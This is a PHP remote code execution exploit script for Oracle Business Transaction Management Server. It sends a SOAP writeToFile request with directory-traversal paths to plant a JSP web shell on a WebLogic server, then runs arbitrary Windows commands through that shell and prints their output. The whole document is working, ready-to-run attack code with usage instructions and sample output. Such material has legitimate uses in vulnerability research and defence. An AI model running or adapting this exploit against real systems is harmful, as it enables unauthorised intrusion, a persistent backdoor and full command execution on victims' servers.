<?php
/*
Oracle Business Transaction Management Server 12.1.0.2.7 FlashTunnelService 
WriteToFile Message Remote Code Execution Exploit

tested against: Microsoft Windows Server 2003 r2 sp2
                Oracle WebLogic Server 12c (12.1.1)
                Oracle Business Transaction Management Server 12.1.0.2.7 (Production version)

Example:
C:\php>php 9sg_ora.php 192.168.2.101 ver
[*] Attacking...
HTTP/1.1 200 OK
Date: Mon, 09 Jul 2012 08:53:11 GMT
Accept-Ranges: bytes
Content-Length: 40
Content-Type: text/plain
Last-Modified: Mon, 09 Jul 2012 08:53:09 GMT
X-Powered-By: Servlet/3.0 JSP/2.2


Microsoft Windows [Version 5.2.3790]


C:\php>php 9sg_ora.php 192.168.2.101 "start calc"


rgod
*/
    error_reporting(E_ALL ^ E_NOTICE);     
    set_time_limit(0);
    
	$err[0] = "[!] This script is intended to be launched from the cli!";
    $err[1] = "[!] You need the curl extesion loaded!";

    if (php_sapi_name() <> "cli") {
        die($err[0]);
    }
    
	function syntax() {
       print("usage: php 9sg_ora.php [ip_address] [cmd]\r\n" );
       die();
    }
    
	$argv[2] ? print("[*] Attacking...\n") :
    syntax();
    
	if (!extension_loaded('curl')) {
        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
        false;
        if ($win) {
            !dl("php_curl.dll") ? die($err[1]) :
             print("[*] curl loaded\n");
        } else {
            !dl("php_curl.so") ? die($err[1]) :
             print("[*] curl loaded\n");
        }
    }
        
    function _s($url, $is_post, $ck, $request) {
        global $_use_proxy, $proxy_host, $proxy_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        if ($is_post == 1) {
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        if ($is_post == 2) {
            curl_setopt($ch, CURLOPT_PUT, 1); 
            curl_setopt($ch, CURLOPT_POSTFIELDS, $request);
        }
        
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "Content-Type: text/xml;charset=UTF-8",
            "SOAPAction: \"http://soa.amberpoint.com/writeToFile\"",
                      

        )); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Jakarta Commons-HttpClient/3.1");
        //curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        //curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_TIMEOUT, 0);
         
        if ($_use_proxy) {
            curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
        }
        $_d = curl_exec($ch);
        if (curl_errno($ch)) {
            //die("[!] ".curl_error($ch)."\n");
        } else {
            curl_close($ch);
        }
        return $_d;
    }
          $host = $argv[1];
          $port = 7001;
          $cmd = $argv[2];




$code='<%@ page import="java.util.*,java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String outstr = "";
        try {
                Runtime rt = Runtime.getRuntime();
                Process p = rt.exec(cmd);
                try {
                         InputStreamReader ise = new InputStreamReader(p.getErrorStream());
                         BufferedReader bre = new BufferedReader(ise);
                         InputStreamReader iso = new InputStreamReader(p.getInputStream());
                         BufferedReader bro = new BufferedReader(iso);
                         String line=null;
                         while ( (line = bre.readLine()) != null ) {
                             System.out.println( line );
                         }
                         while ( (line = bro.readLine()) != null ) {
                             System.out.println(line );
                         }

                } catch (IOException ioe)
                {
                        ioe.printStackTrace();  
                }
        }
        catch (Throwable t) {
                t.printStackTrace();
        }

%>
';
$code=htmlentities($code); //convert all to html entities, then no bad chars

//we should write to:
//C:\Oracle\Middleware\wlserver_12.1\samples\server\examples\build\mainWebApp\WEB-INF\classes\mainWebApp#\suntzu.jsp
//C:\Oracle\Middleware\wlserver_12.1\samples\server\examples\build\mainWebApp\suntzu.jsp
//change to a location of choice

$path=array('\server\examples\build\mainWebApp',
            '\server\examples\build\mainWebApp\WEB-INF\classes\mainWebApp#');


for ($i=0; $i<count($path); $i++){
$soap='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:int="http://schemas.amberpoint.com/flashtunnel/interfaces" xmlns:typ="http://schemas.amberpoint.com/flashtunnel/types">
   <soapenv:Header/>
   <soapenv:Body>
      <int:writeToFileRequest>
         <int:writeToFile handle="..\..\..\..\..\..\..\..\..\..'.$path[$i].'\suntzu.jsp">
            <typ:text>'.$code.'</typ:text>
            <typ:WriteToFileRequestVersion>
            </typ:WriteToFileRequestVersion>
         </int:writeToFile>
      </int:writeToFileRequest>
   </soapenv:Body>
</soapenv:Envelope>';

$url = "http://$host:$port/btmui/soa/flash_svc/";
$out = _s($url, 1, "", $soap);
//print($out."\n");
sleep(1);
}

$cmd="cmd.exe /c ".$cmd." > ../../server/examples/build/mainWebApp/sh.txt";
$url = "http://$host:$port/suntzu.jsp?cmd=".urlencode($cmd);
$out = _s($url, 0, "", "");
//print($out."\n");

sleep(2);

$url = "http://$host:$port/sh.txt";
$out = _s($url, 0, "", "");
print($out."\n");
?>